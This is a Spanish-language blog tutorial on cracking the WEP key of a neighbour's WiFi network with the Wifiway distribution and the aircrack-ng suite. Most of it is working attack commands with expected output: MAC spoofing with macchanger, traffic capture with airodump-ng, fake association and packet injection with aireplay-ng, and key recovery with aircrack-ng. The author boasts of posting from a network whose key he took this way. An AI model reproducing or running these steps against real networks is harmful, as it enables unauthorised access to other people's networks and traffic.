Hackear las claves WEP de una red WiFi es algo bastante sencillo, solo que es largo y quizas para algunos tediosos el proceso, pero recuerda no es lo mismo que tenga WPA que una clave WEP, dado que ahi es casi imposible, te repito este metodo que te explicaré mas abajo no sirve si tu vecino tiene WPA, recuerda antes verificar si la red tiene WPA.
¿Qué es una clave WEP?, bueno es una clave que usa un sistema de cifrado, muy usado en las redes Wireless, con propósito de encriptar la información. Por eso dado que hay muchas vulnerabilidades WEP es recomendable que se use el sistema WPA, si es que uno quiere mantener la conexión segura.
La guia para poder “hackear la clave” no es muy dificil , solo que es largo de explicar, para eso les proporcionaré un archivo de texto, en donde estan todos los pasos para poder llevarlo a cabo.
Primero todo lo ha descargar y necesario
1 CD o Pendrive que se soporte como booteable de 1GB
Distribucion GNU Linux de WIFIWAY
http://download.wifislax.com:8080/wifiway-1-final.iso
Un adaptador Wifi que soporte el modo monitor
unos 2 kilos de paciencia
1- Bajarse la dsitribucion linux ( si lo vas a grabar saltate el paso 2)
2- Convertir tu pendrive a booteable es facil, descomprime la imagen, copia las dos carpetas a tu usb, vas a ejecutar y escribes cmd, escribes x: segun sea la letra de tu pendrive, escribes cd boot/ y luego escribes bootinst.bat, te dira persiona una tecla y estara listo dira succefull y presiona una tecla para salir
3- ahora reinicias y activas el boot del cd o pendrive segun sea el caso y le damos click a la primera opcion que veamos y cuando cargue escribes startx para iniciar
Nombre de nuestra tarjeta, modo monitor y detectar redes a nuestro alcance
-Averiguamos cual es nuestra tarjeta wifi: Inicio/Centro de control/Internet y red/Red inalámbrica. En la pestaña “Configuración 1” si esta marcado “Autodetectar”, ya sale el nombre en el campo “Interfaz” (en este caso “ath0”)
– Abrimos el modo monitor de nuestra tarjeta: Inicio/Wifiway/Chipset/Atheros/Add interface (Mode monitor). Lo minimizamos pero no lo cerramos.
– Para ver que redes podemos abrir, vamos a Inicio/Wifiway/Suite aircrack-ng/Airodump-ng. Seleccionamos nuestra tarjeta (en este caso ath0). “Aplicar” y “Ok”. Veremos las redes a nuestro alcance con varios datos como el canal (CH) y la encriptación (WEP, WPA, WPA2, etc). Las nuestras son las WEP. Nos quedamos con la que tenga más fuerza (más PWR) y nos fijamos en el canal. En este caso es el 9. Cerramos la ventana.
3 – Cambiar MAC a la tarjeta, capturar tráfico e inyectar tráfico
– En el escritorio, pinchamos en un icono llamado “Konsole”
– Cuando se abra cambiamos la MAC de nuestra tarjeta:
* ifconfig ath0 down
* macchanger -m 00:11:22:33:44:55 ath0
Pondrá lo siguiente
– Current MAC: xx:xx:xx:xx:xx:xx (unknown)
– Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
* ifconfig ath0 up
-Se debe cambiar el canal de nuestra tarjeta en otra console : airmon-ng start [interface] –c (canal)
Ejemplo: airmon-ng start ath0 -c 3
para asegurarte hazlo varias veces: copiar pegar, este comando tambien activa el modo monitor
– Empezamos a capturar tráfico (el 9 en este caso es el canal en el que me fijé antes):
* airodump-ng -w captura -c 9 ath0
– Si suben mucho los #DATA (necesitamos unos 200.000) nos saltamos estos pasos y seguimos en el punto 4. Sino es que no hay tráfico y hay que crearlo.
– Pinchamos otra vez en el escritorio en el icono “Konsole” (todo esto sin cerrar las ventanas anteriores). Creamos una asociación en el Punto de Acceso.
* aireplay-ng -1 0 –e “WLAN_47” -a 00:19:CB:XX:XX:XX -h 00:11:22:33:44:55 ath0
(00:19:CB:XX:XX:XX es la dirección de la red. También aparece en la ventana anterior donde ejecutamos airodump-ng debajo de “BSSID”. WLAN_47 es la red que me interesa. Va entre comillas y con mayúsculas o minúsculas según aparezca a la derecha de todo en la ventana anterior (donde ejecutamos airodump-ng que esta intentado capturar el tráfico). Si es un nombre simple creo que vale de cualquier forma y sin comillas
Si todo esta bien, aparece:
– Sending Authentication Request (Open System) [ACK]
– Authentication successful
– Sending Association Request [ACK]
– Association succesful (AID:1)
– Empezamos a inyectar tráfico:
* aireplay-ng -3 –b 00:19:CB:XX:XX:XX –h 00:11:22:33:44:55 ath0
– En breve deberían empezar a subir los #DATA en la ventana del “Airodump”
4 – Descifrar el código
– En el escritorio abrimos “Personal”. Ahí nos aparecerán los archivos que hemos creado (“Captura”). Dependiendo de si hemos estado haciendo pruebas, habrá más o menos. Normalmente es el más grande con extensión .cap. En mi caso, tengo “captura-01.cap” y “captura-02.cap”. Me quedo con este último nombre
– En un rato y dependiendo de los miles de #DATA que tengamos (dependiendo de la fuerza de la señal tardará más o menos, pero esperaremos a tener al menos 150.000), sin cerrar nada, abrimos en el escritorio “Konsole”.
* aircrack-ng captura-02.cap
– Escogemos en número de la red que nos interesa. En mi caso la 1
– Empezará a procesar los datos. Si en unos segundos no lo consigue, pulsamos “Ctrl.+C” para que se detenga.
– Esperamos a que consiga más #DATA y volvemos a poner el mismo comando. Si tiene #DATA suficientes, nos dará el código en un par de segundos.
– Cuando metamos el comando y obtenga la clave pondrá algo similar a esto:
“KEY FOUND! [ 5A:30:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: Z00 02CFXXXXXX)
Decrpted correctly: 100%”
– En mi caso necesité 136.000 #DATA
– Apuntamos los códigos en hexadecimal 5A:30:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX y en ASCII 02CFXXXXXX
5 – Salir y conectarnos con Windows
– Para salir, Inicio/Terminar y luego ponemos “Poweroff”
– Arrancamos Windows. Y logicamente vemos conexiones de red, nos tratamos de ingresar e ingrasamos la clave
Algunos datos: postee esto porque funciona, lo poco que escribi en este post lo hice desde mi casa conectado a una wep desde la que obtuve la clave, si no funciona es que sus chipsets no son compatibles o no lo hacen bien.
Un problema que tuve fue en el paso de crear la asociacion del punto de acceso porque a veces el canal no coincide aunque lo cambies, hay que escribir el comando muchas veces y probar.
Desde: www.vivalared.com
Leave a Reply
You must be logged in to post a comment.